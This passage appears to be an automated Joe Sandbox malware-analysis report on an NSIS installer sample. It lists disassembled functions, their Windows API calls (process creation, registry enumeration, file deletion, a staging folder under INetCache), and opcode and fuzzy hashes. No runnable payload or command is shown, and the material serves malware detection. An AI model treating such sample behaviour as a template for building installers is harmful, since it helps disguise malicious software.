Part of subcall function 00405A02: CharNextA.USER32(?,?,C:\,?,00405A6E,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405A10
Part of subcall function 00405A02: CharNextA.USER32(00000000), ref: 00405A15
Part of subcall function 00405A02: CharNextA.USER32(00000000), ref: 00405A29

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004055D6: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405619

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme
API String ID: 1892508949-139713324
Opcode ID: d3ecf39b463245ce7325277e5a84709cb344a9e2d097f8503a0b38c2d9d22c49
Instruction ID: 08eb89b31b1746408a8977735749f07bd83b4a0adfeb71850534f1b020668021
Opcode Fuzzy Hash: d3ecf39b463245ce7325277e5a84709cb344a9e2d097f8503a0b38c2d9d22c49
Instruction Fuzzy Hash: AF110831608151EBDF317FA54D415BF26B0DA92324B28097FE4D1B22D2D53E4943AA7E

Function 00405A57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405EF7: lstrcpynA.KERNEL32(?,?,00000400,0040336D,00422F20,NSIS Error), ref: 00405F04

Part of subcall function 00405A02: CharNextA.USER32(?,?,C:\,?,00405A6E,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405A10
Part of subcall function 00405A02: CharNextA.USER32(00000000), ref: 00405A15
Part of subcall function 00405A02: CharNextA.USER32(00000000), ref: 00405A29

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405AAA
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0), ref: 00405ABA

Strings

C:\, xrefs: 00405A5D, 00405A62, 00405A68, 00405AA3, 00405AA9, 00405AB1, 00405AB9

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
Instruction ID: e1d085c028a746cb3a9e1ce3b1c858eea9bd943bc63f8ca8d2e2b8bbc1a38a79
Opcode Fuzzy Hash: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
Instruction Fuzzy Hash: 02F0C835305D6526C622233A5C89AAF5A54CE86324719073BF891B52D2DB3C89439D7E

Function 00405688 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 004056B1
CloseHandle.KERNEL32(?), ref: 004056BE

Strings

Error launching installer, xrefs: 0040569B

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
Instruction ID: a84e3f3112e4284354e87e930577f618970dfa48977d7da17d28cbc3385d6636
Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
Instruction Fuzzy Hash: 36E04FB0A002097FEB009B60EC05F7B7ABCE710204F808571BD01F2160D278A8008A78

Function 00406977 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
Instruction ID: 2e33bf0a2efd24b19013112e0e3dc0c5d96cbb3b8ddfa3d6198f03b0ea5f4905
Opcode Fuzzy Hash: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
Instruction Fuzzy Hash: 38A14271E00229CBDF28CFA8C8447ADBBB1FF44305F15806AD856BB281D7789A96DF44

Function 00406B78 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
Instruction ID: b6fdc69984dd60fe5839cdbb69547f11a37967466e553f406be5e4f069ddcdf3
Opcode Fuzzy Hash: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
Instruction Fuzzy Hash: 06912371E00228CBDF28CF98C8547ADBBB1FF44305F15816AD856BB291C778AA96DF44

Function 0040688E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
Instruction ID: c7cee2028620334147dbeeecb81edbae78790ee6bd2d36d3aed28758d5738f0f
Opcode Fuzzy Hash: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
Instruction Fuzzy Hash: CF813471E00228DBDF24CFA8C844BADBBB1FF44305F25816AD856BB291D7389996DF14

Function 00406393 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
Instruction ID: 57d0a4a62e73b261e138738b2685f27b9a830e1577229771e06a9dcc4a08ef7a
Opcode Fuzzy Hash: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
Instruction Fuzzy Hash: DC816771E04228DBDF24CFA8C844BADBBB1FF44315F11816AD856BB280C7786996DF44

Function 004067E1 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
Instruction ID: 7a0e56a60353855b6858f4e45cba095cd8fb81da81d2b3e1620468e36a0fecf5
Opcode Fuzzy Hash: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
Instruction Fuzzy Hash: E2710371E00228DBDF28CFA8C844BADBBB1FF44305F15806AD856BB291D7389996DF54

Function 004068FF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
Instruction ID: 640397e2d056f1a05ee02a3664d9fcc147c5dfb75bdb54ac859d1c8af1b059c5
Opcode Fuzzy Hash: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
Instruction Fuzzy Hash: 7F712471E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB291C7789996DF48

Function 0040684B Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
Instruction ID: 45e0d9c6199636d87fa33ccb5d6651f7628d4ee42d5e4054af8bad143df77737
Opcode Fuzzy Hash: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
Instruction Fuzzy Hash: D1714771E00228DBDF28CF98C844BADBBB1FF44305F15806AD956BB291C778AA56DF44

Function 00402241 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004061FB: FindFirstFileA.KERNELBASE(75923410,00421580,C:\,00405A9A,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0), ref: 00406206
Part of subcall function 004061FB: FindClose.KERNEL32(00000000), ref: 00406212

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402281
lstrlenA.KERNEL32(00000000), ref: 0040228B
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022B3

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 68b53b7b15cd5aa11021285071f00655329fa620989aceaac5983d704ca72be5
Instruction ID: 0317ded50e63044e70734c05992738adc8c04a0539f45c02fec05e083cfe155c
Opcode Fuzzy Hash: 68b53b7b15cd5aa11021285071f00655329fa620989aceaac5983d704ca72be5
Instruction Fuzzy Hash: 15113071E14219AACB10EFF5DA49A9EBAB8AF44314F14447FB100FB2C2D6BDC5418B69

Function 00401EB3 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll), ref: 0040517E
Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

Part of subcall function 00405688: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 004056B1
Part of subcall function 00405688: CloseHandle.KERNEL32(?), ref: 004056BE

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401EED
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EFD
CloseHandle.KERNELBASE(?,00000000,000000EB,00000000), ref: 00401F22

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: e995d9f419432ab23205a23d5c1414ada8c426ee2d3ef18cbb1adcd6d691f71f
Instruction ID: d3d55c0d0bbc33f725c23921dd181786adb59914180f86dd2947d51e8879a6ae
Opcode Fuzzy Hash: e995d9f419432ab23205a23d5c1414ada8c426ee2d3ef18cbb1adcd6d691f71f
Instruction Fuzzy Hash: 3C019231E04106EBCF20AF91CD49AAE7BB1EB40314F10807BF605B61E1C7794A859B9E

Function 004024F5 Relevance: 4.5, APIs: 3, Instructions: 46registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000494,00000000,00000022,00000000,?,?), ref: 00402C00

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402527
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040253A
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 05547f92edfa2ad71c40473a60083347d41093bd1c43fb3d169fc0aa66b556e7
Instruction ID: 11bb5dddaf85e4de06b60e46a4a286c6c0f73d8de59455db5a8421e4b605592f
Opcode Fuzzy Hash: 05547f92edfa2ad71c40473a60083347d41093bd1c43fb3d169fc0aa66b556e7
Instruction Fuzzy Hash: 5601DFB1A04201FFE7119F65AD88ABF7ABCDF40395F20003FF105A61C0D6B84A41966A

Function 00405DDE Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00406023,00000000,00000002,?,00000002,?,?,00406023,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E07
RegQueryValueExA.KERNELBASE(?,?,00000000,00406023,?,00406023), ref: 00405E28
RegCloseKey.KERNELBASE(?), ref: 00405E49

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
Instruction ID: a5bfd4e994019c5e115080bbecddc2f5f1976c63067f757e38b3d402cdd28771
Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
Instruction Fuzzy Hash: 5F014C7154020AEFDB118F64DD48EDB3FACEF14354B004036FA4596220D235DA64CBA5

Function 00405751 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405B45: GetFileAttributesA.KERNELBASE(?,?,0040575D,?,?,00000000,00405940,?,?,?,?), ref: 00405B4A
Part of subcall function 00405B45: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B5E

RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405940), ref: 0040576C
DeleteFileA.KERNELBASE(?,?,?,00000000,00405940), ref: 00405774
SetFileAttributesA.KERNEL32(?,00000000), ref: 0040578C

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
